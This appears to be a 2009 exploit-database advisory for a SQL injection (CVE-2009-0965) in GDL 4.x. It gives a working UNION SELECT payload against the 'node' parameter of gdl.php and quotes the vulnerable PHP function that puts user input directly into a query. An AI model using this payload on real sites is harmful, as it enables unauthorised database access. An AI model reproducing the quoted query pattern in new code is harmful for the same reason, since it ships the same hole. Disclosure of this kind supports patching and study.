GDL 4.x - 'node' SQL Injection

Related Vulnerabilities: CVE-2009-0965  
Publish Date: 17 Mar 2009
Author: g4t3w4y

   [ Discovered by g4t3w4y \ jkthackerlink[at] ]
   [ transitory only :) ]
 #  [ GDL v.4.x ]    SQL Injection Vulnerability   #
 # Script:
 # GDL 4.0 | htdocs .gz
 # GDL 4.0 | windows application
 # GDL 4.2 | htdocs .zip
 # Script site:
 # Download:
 # [SQL] Vuln : http://localhost/gdl.php?mod=browse&node=0+AND+1=2+UNION+SELECT+0,1,2--
 # Bug: ./functions/browse.php (line: 286-311)
 # function browse_child_list($node)
 # {
 #     $strsql = "SELECT folder.*, folder_tree.NODE
 #                FROM folder, folder_tree
 #                WHERE
 #                    folder_tree.PARENT = '$node' AND
 #                    folder_tree.NODE = folder.NODE ";
 #     $dbres = mysql_query($strsql);               
 #    if ($dbres){
 #            while ($row = mysql_fetch_array($dbres)){                  //  SQL inj
 #            $html .= browse_folder_print($row,2);
 #        }       
 #         if (!empty($html)){
 #             $box_html = "<table cellSpacing=0 cellPadding=2 border=0>$html</table>";
 #             return $box_html;
 #         } else {
 #             return NULL;
 #         }   
 #     } else {
 #         stdout_error(mysql_error());
 #         return NULL;
 #     }
 # }
 # Greetz: cozmaster * E-C-H-O Team * and otherz..           #

 [ g4t3w4y / 2009 ]


# [2009-03-17]